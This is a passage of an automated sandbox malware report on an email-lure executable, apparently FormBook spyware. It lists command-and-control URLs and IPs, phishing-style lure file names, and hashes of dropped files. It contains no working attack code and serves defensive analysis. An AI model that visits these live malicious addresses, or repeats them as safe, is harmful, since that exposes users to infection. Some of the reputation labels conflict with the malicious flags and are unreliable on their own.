                                http://www.snyp.shop/4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNEtrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabchoice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9dchoice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2505224111.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003398000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://54.244.188.177/usxspa-tMA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchoice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://whois.gandi.net/en/results?search=sunnyz.storechoice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.gandi.net/en/domainchoice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://54.244.188.177/MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://54.244.188.177:80/usxspMA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.snyp.shopfbLIkXRoMf.exe, 00000012.00000002.2505900550.000000000514B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://54.244.188.177/usxspMA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.248.169.48
                                                      		www.snyp.shopUnited States
                                                      		16509AMAZON-02UStrue
                                                      38.165.29.234
                                                      		www.8312zcksnu.bondUnited States
                                                      		174COGENT-174UStrue
                                                      54.244.188.177
                                                      		pywolwnvd.bizUnited States
                                                      		16509AMAZON-02USfalse
                                                      217.70.184.50
                                                      		webredir.vip.gandi.netFrance
                                                      		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                      154.23.184.207
                                                      		d48dk.topUnited States
                                                      		174COGENT-174UStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1572587
                                                      Start date and time:2024-12-10 17:58:07 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 39s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:19
                                                      Number of new started drivers analysed:3
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:MA-DS-2024-03 URGENT.exe
                                                      Detection:MAL
                                                      Classification:mal100.spre.troj.spyw.evad.winEXE@10/11@5/5
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 78%
                                                      • Number of executed functions: 75
                                                      • Number of non-executed functions: 243
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • VT rate limit hit for: MA-DS-2024-03 URGENT.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      13:34:23API Interceptor297587x Sleep call for process: choice.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      13.248.169.48Recibos.exeGet hashmaliciousFormBookBrowse
                                                      • www.egyshare.xyz/lp5b/
                                                      AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                      • www.avalanchefi.xyz/ctta/
                                                      AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                      • www.avalanchefi.xyz/ctta/
                                                      Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                      • www.hsa.world/09b7/
                                                      MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                      • www.lovel.shop/rxts/
                                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • www.snyp.shop/4nyz/
                                                      NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.krshop.shop/5p01/
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • www.egyshare.xyz/440l/
                                                      purchase order.exeGet hashmaliciousFormBookBrowse
                                                      • www.aktmarket.xyz/wb7v/
                                                      SRT68.exeGet hashmaliciousFormBookBrowse
                                                      • www.avalanchefi.xyz/vxa5/
                                                      38.165.29.234RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • www.8312zcksnu.bond/d3gs/
                                                      54.244.188.177Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                                      • cvgrf.biz/iropyruplkan
                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                      • cvgrf.biz/hfsfqfqbrwib
                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                      • cvgrf.biz/npdqgsoqmq
                                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • cvgrf.biz/rtjcy
                                                      OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                                      • pywolwnvd.biz/hemfkj
                                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • pywolwnvd.biz/nwqf
                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                      • cvgrf.biz/yqmdwhskkjhif
                                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                      • lrxdmhrr.biz/tgcwttfqletfhyq
                                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                      • rynmcq.biz/msoqwwrwyts
                                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                      • rynmcq.biz/qqnj

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      webredir.vip.gandi.netRFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                      • 217.70.184.50
                                                      Order No 24.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      SWIFT.exeGet hashmaliciousFormBookBrowse
                                                      • 217.70.184.50
                                                      www.8312zcksnu.bondRFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • 38.165.29.234
                                                      www.snyp.shopRFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      pywolwnvd.bizRequest for Quotation.exeGet hashmaliciousFormBookBrowse
                                                      • 54.244.188.177
                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 54.244.188.177
                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                      • 54.244.188.177
                                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                      • 54.244.188.177
                                                      OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                                      • 54.244.188.177
                                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 54.244.188.177
                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                      • 54.244.188.177
                                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                      • 54.244.188.177
                                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                      • 54.244.188.177

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      COGENT-174USZ9lFNBiLGK.exeGet hashmaliciousDBatLoaderBrowse
                                                      • 198.16.88.194
                                                      Z9lFNBiLGK.exeGet hashmaliciousDBatLoaderBrowse
                                                      • 198.16.88.194
                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                      • 154.23.184.194
                                                      rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 38.181.222.220
                                                      rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 198.242.174.67
                                                      rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 154.61.11.142
                                                      rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 38.30.130.166
                                                      rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 149.122.32.48
                                                      rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 38.24.82.138
                                                      la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                      • 38.46.12.186
                                                      AMAZON-02UShttps://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                      • 3.5.217.53
                                                      https://app.droplet.io/form/Ko1loyGet hashmaliciousUnknownBrowse
                                                      • 3.23.93.108
                                                      bin.sh.elfGet hashmaliciousUnknownBrowse
                                                      • 54.171.230.55
                                                      Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                                      • 18.141.10.107
                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 18.141.10.107
                                                      http://abercombie.comGet hashmaliciousUnknownBrowse
                                                      • 3.160.188.18
                                                      https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exeGet hashmaliciousUnknownBrowse
                                                      • 13.227.9.131
                                                      https://districtwharfoffices.com/l/homeGet hashmaliciousUnknownBrowse
                                                      • 3.164.182.25
                                                      https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                      • 13.227.2.22
                                                      https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                      • 108.158.75.129
                                                      AMAZON-02UShttps://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                      • 3.5.217.53
                                                      https://app.droplet.io/form/Ko1loyGet hashmaliciousUnknownBrowse
                                                      • 3.23.93.108
                                                      bin.sh.elfGet hashmaliciousUnknownBrowse
                                                      • 54.171.230.55
                                                      Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                                      • 18.141.10.107
                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 18.141.10.107
                                                      http://abercombie.comGet hashmaliciousUnknownBrowse
                                                      • 3.160.188.18
                                                      https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exeGet hashmaliciousUnknownBrowse
                                                      • 13.227.9.131
                                                      https://districtwharfoffices.com/l/homeGet hashmaliciousUnknownBrowse
                                                      • 3.164.182.25
                                                      https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                      • 13.227.2.22
                                                      https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                      • 108.158.75.129

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1658880
                                                      Entropy (8bit):4.312999268593951
                                                      Encrypted:false
                                                      SSDEEP:24576:kxGBcmlyVg9N9JMlDlfjRiVuVsWt5MJMs:wGy+egFIDRRAubt5M
                                                      MD5:A7B2833265E5E73E4BC1B1899D393D76
                                                      SHA1:2F1E2707A31AC5EFFD8C067CFA19F27DD39D0E2E
                                                      SHA-256:965DF3470AD9923417AC4EFB4DE87E0FF11D3E8AB97847CC876F01463BF04BF5
                                                      SHA-512:C081B719A63C383139418E3868A12BC20B309E56DB2189E12C8079BFA5928FF2C5C192C4FAC6D81E638BED5323C10704C82B8D869550B60C3957677ED1B36C09
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................;.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\G109m407

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\choice.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:modified
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1215420383712111
                                                      Encrypted:false
                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\autD77C.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288768
                                                      Entropy (8bit):7.995845027904257
                                                      Encrypted:true
                                                      SSDEEP:6144:XPtnx0qo/dnyyKDyXlZUMyHIFBw5gWcpqEQScQ+Z8YSoxTyY4:/9xEFytOZU7BEkEQDVGNoxh4
                                                      MD5:B9AD26AFFCF5B169815866938EE844A3
                                                      SHA1:2C5BAC9CD4BE7E01786D32AD27355889F82D12F4
                                                      SHA-256:527F910B19453AA9423EA53DB1E7B81D39C18655C89519C80DD1323394F28A9B
                                                      SHA-512:BBC73EFC069BD6A5205856145DB07681F999716E51D676E7FE8D25E062F55C9A4FC18FF3537A3D6EE0CE2E41664DA82A4F5C95E554956631977CBCBCACE7624C
                                                      Malicious:false
                                                      Preview:.i.PHQ8O68TT.69.APD3SA1.YJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O.8TT?J.72.Y...@}.x.[,#k!J UJ59.6WW\.$dQ6aC=7jZ+p..ko_W01.X;3.APD3SA11XC.x0,../U.i4V.,...j$T.[..vS".Q....X3.c<UQ.!7.3SA1HYJ3..KQtN38....692APD3S.1JXA2NPK.<O28TT1U692TPD3CA1H)N3EP.Q8_28TV1U092APD3SG1HYJ3EPK!<O2:TT1U690A..3SQ1HIJ3EP[Q8_28TT1U&92APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U69.55<GSA1..N3E@KQ8.68TD1U692APD3SA1HYj3E0KQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT

                                                      C:\Users\user\AppData\Local\Temp\autD7EB.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):14646
                                                      Entropy (8bit):7.6318606634920965
                                                      Encrypted:false
                                                      SSDEEP:384:ITYznwlR6ovC0TD4gjTaJEXbFuI+/wT5rS3p3isCLV:IAwlooK0TMgjmJQBuI+QTsCZ
                                                      MD5:0CD1F14FED6AB1F6AA6A8BC2ECF8EC8A
                                                      SHA1:683EABB8A817BE130459DEE4F582E74E65466F85
                                                      SHA-256:A517CDF9F74A56735E092FD8F66C995389D74E1E726C8BD59FE67CEA264CB742
                                                      SHA-512:B3DE9DF2FA737AB4CB46FDDA87037E66C90EF3B9B0309008DB18E6566EA2AAC8DD58ED7067246C2235D1136E94E233E96652327BE4BB04EBAE76A979AB03A04D
                                                      Malicious:false
                                                      Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                      C:\Users\user\AppData\Local\Temp\recomplete

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):143378
                                                      Entropy (8bit):2.9931612803905234
                                                      Encrypted:false
                                                      SSDEEP:96:AIXLr4e+F05BLMoQCs0FlRZpA6Rqk5OEGcud9IvySuE3WrWVjj3qnBaAJZdjureP:H3BjDROuZGcud9IvySuE3WrWVfqnBaA
                                                      MD5:A9DA76BB6C03093AC9DC7FDC3FD03B66
                                                      SHA1:CE87AD7C621CF4FCAD47C1ECEC3646E67C06FB81
                                                      SHA-256:523FDDFE5844D0A2EDBD709EA4760B5A9A90FE7FD2AB5A2D4F7470CC9D1DD811
                                                      SHA-512:CB2BC4A13AF0C53803CDE0D5AE31D7786E817611EE17BC55F1056C82EFEFB2516011CC8881C822C3190C1B9942A69CF5F6E25B995C94635EC67EBF658163C3F9
                                                      Malicious:false
                                                      Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                                                      C:\Users\user\AppData\Local\Temp\uppishly

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288768
                                                      Entropy (8bit):7.995845027904257
                                                      Encrypted:true
                                                      SSDEEP:6144:XPtnx0qo/dnyyKDyXlZUMyHIFBw5gWcpqEQScQ+Z8YSoxTyY4:/9xEFytOZU7BEkEQDVGNoxh4
                                                      MD5:B9AD26AFFCF5B169815866938EE844A3
                                                      SHA1:2C5BAC9CD4BE7E01786D32AD27355889F82D12F4
                                                      SHA-256:527F910B19453AA9423EA53DB1E7B81D39C18655C89519C80DD1323394F28A9B
                                                      SHA-512:BBC73EFC069BD6A5205856145DB07681F999716E51D676E7FE8D25E062F55C9A4FC18FF3537A3D6EE0CE2E41664DA82A4F5C95E554956631977CBCBCACE7624C
                                                      Malicious:false
